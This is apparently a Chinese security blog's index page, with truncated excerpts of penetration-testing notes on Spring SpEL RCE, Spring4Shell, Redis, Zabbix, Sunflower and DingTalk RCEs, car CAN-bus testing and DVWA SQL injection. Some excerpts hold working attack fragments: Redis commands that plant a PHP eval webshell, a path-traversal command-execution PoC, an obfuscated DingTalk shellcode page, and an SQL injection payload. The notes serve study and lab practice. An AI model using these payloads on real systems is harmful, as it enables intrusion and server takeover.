weixin_45794666的博客

Spring Cloud Function Spel表达式注入漏洞概述Spring Cloud Function 是基于Spring Boot 的函数计算框架（FaaS），支持基于SpEL的函数式动态路由。在特定配置下，3 <= 版本 <= 3.2.2（ commit dc5128b 之前）存在SpEL表达式执行导致的RCE。环境搭建在IDEA中选择新建项目，然后选择Spring Initializr，输入随机项目名称，然后选择java版本和jdk版本后点击下一步。选择Spring

Spring Framework RCE(CVE-2022-22965)利用环境war包https://github.com/fengguangbin/spring-rce-wardocker环境https://github.com/lunasec-io/Spring4Shell-POChttps://github.com/vulhub/vulhub/tree/master/spring/CVE-2022-22965在线环境http://vulfocus.io漏洞原理

汽车安全测试CANcontroller area network - 汽车所有/某些 部件之间进行通信的中枢CAN流量是通过UDP而不是TCP进行传输的OBD要访问汽车的CAN总线，您必须能够访问驾驶室诊断端口。虽然当前的诊断标准和端口有数百种之多，但如今OBD-II已经成为了事实标准，几乎所有汽车都使用这种诊断端口。实际上，汽车修理工诊断汽车故障时，使用的就是它。通过OBD可以直接访问CAN，并且是最直接的方式。另外，OBD-II也很容易找到：通常位于前排乘客或驾驶员座位附近的某个地方，而且不需

SpEL表达式注入漏洞前言因为前端时间的spring gateway rce正是由此导致的所以来学习一下介绍Spring Expression Language（简称SpEL）是一种强大的表达式语言，支持在运行时查询和操作对象图。语言语法类似于统一EL，但提供了额外的功能，是方法调用和基本的字符串模板了同时SpEL是API接口的形式因为创建的，所以允许将其集成到其他应用程序和框架中。环境搭建https://github.com/LandGrey/SpringBootVulExploit/tree

工作原理漏洞扫描器向目标计算机发送数据包，然后根据对方反馈的信息来判断对方的操作系统类型、开发端口、提供的服务等敏感信息。端口扫描原理：端口扫描的原理其实非常简单，简单的利用操作系统提供的connect()系统调用（有各种协议），与目标计算机的端口进行连接。如果端口处于侦听状态，那么connect()能够成功，否则，这个端口是不能用的，就是没有提供服务。漏洞扫描原理检测扫描目标主机中可能大量已知的漏洞，如果发现潜在漏洞可能，就报告扫描者。这种扫描器的威胁更大，因为黑客可以直接利用扫描结果进行

bypass disable_functionsdisable_functions是php.ini中的一个设置选项，可以用来设置PHP环境禁止使用某些函数，通常是网站管理员为了安全起见，用来禁用某些危险的命令执行函数等。要进行添加的话在php.ini中添加即可，每个函数之间使用逗号隔开。配置打开php.ini，搜索disable_function，添加如下函数eval,passthru,exec,system,chroot,scandir,chgrp,chown,shell_exec,proc_o

Redis主从复制未授权访问版本3.2之前都是绑定0.0.0.0:6379所以暴露在公网3.2之后绑定127.0.0.1相对安全，但是还是无密码可以利用ssrf进行利用(gopher，dict)利用注意flushall危险操作，会清空所有缓存数据。通用写入webshellflushallset x '<?php eval($_GET["Q"]);?>'config set dir /var/www/html/uploadconfig set dbfilename tes

Zabbix-CVE-2022-231310x01漏洞介绍Zabbix Sia Zabbix是拉脱维亚Zabbix SIA（Zabbix Sia）公司的一套开源的监控系统。该系统支持网络监控、服务器监控、云监控和应用监控等。Zabbix Frontend 存在安全漏洞，该漏洞源于在启用 SAML SSO 身份验证（非默认）的情况下，恶意行为者可以修改会话数据，因为存储在会话中的用户登录未经过验证。攻击条件限制：需要启用 SAML 身份验证，并且攻击者必须知道 Zabbix 用户的用户名（或使用默

向日葵POCping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2Fwhoami端口扫描首先扫描端口获取sid可以通过已知向日葵端口 + cgi-bin/rpc?action=verify-haras的拼接来获取CID的值。 此时的url： http://192.168.159.151:49197/cgi-bin/rpc?action=verify-haras每次访问不一样，但是都可以用dmP

dingtalk-RCE漏洞版本：6.3.5触发方式：dingtalk://dingtalkclient/page/link?url=127.0.0.1/test.html&pc_slide=truehtml，改shellcode变量即可<html><body> <h1> test </h1> <script> var _0x1b17=['KELCi8OxLg==','ZE/CpWvCpDkcPA==

微信小程序小程序测试流程分为两个方面，解包可以挖掘信息泄露问题、隐藏的接口，抓包可以测试一些逻辑漏洞、API安全问题。两者结合起来就可以边调试边进行测试，更方便于安全测试。搜索目标小程序目标搜索不能仅仅局限于主体单位，支撑单位、供应商、全资子公司等都可能是入口点，所以小程序当然也不能放过它们。小程序主体信息确认查看小程序账号主体信息，否则打偏了花费了时间不说，还可能有法律风险。点击小程序，点更多资料就能看到小程序相关信息小程序包获取PC端首先在微信中搜索到小程序，并打开简单浏览然后在自己

全局扫描mobsf安装要求Install GitInstall Python 3.8-3.9Install JDK 8+Install Microsoft Visual C++ Build ToolsInstall OpenSSL (non-light)Download & Install wkhtmltopdf as per the wiki instructionsAdd the folder that contains wkhtmltopdf binary to envi.

目录Python中Socket编程 1一、Socket概述 1二、python中socket模块使用 1三、socket之聊天室 3四、socket之端口探测 7五、scapy之tcp端口探测 11Python中Socket编程一、Socket概述socket通常也称作"套接字"，用于描述IP地址和端口，是一个通信链的句柄，应用程序通常通过"套接字"向网络发出请求或者应答网络请求。socket即是一种特殊的文件，socket函数就是对其进行的操作（读/写IO、打

网络安全防护_多线程多线程什么是线程线程（Thread）被包涵在进程之中，是进程中的实际运作单位。一个线程可以创建和撤消另一个线程，同一进程中的多个线程之间可以并发执行。为什么要使用多线程使用多线程来实现多任务并发执行比使用多进程的效率高。python多线程实现简单使用import threadingimport timedef run(n): print("task", n) time.sleep(1) print('2s')

Sql注入学习需要用到靶机DVWA.由于忘记了账号密码,用Navicat去本地服务器找到DVWA数据库里的user表可知默认账号有五个 密码通过md5加密,去百度使用在线解密即可进入DVWA后,选择low安全级别方法一使用’ or 1==1 – ddddd 获取了所有用户信息封闭前面语句 在给予一个绝对真的条件 在注释掉后面语句由于sql语句前面内容已经写死,想要查询更多的内容就需要union来进行联合查询方法二使用Union来联合查询问题1:Union 需要查询字段数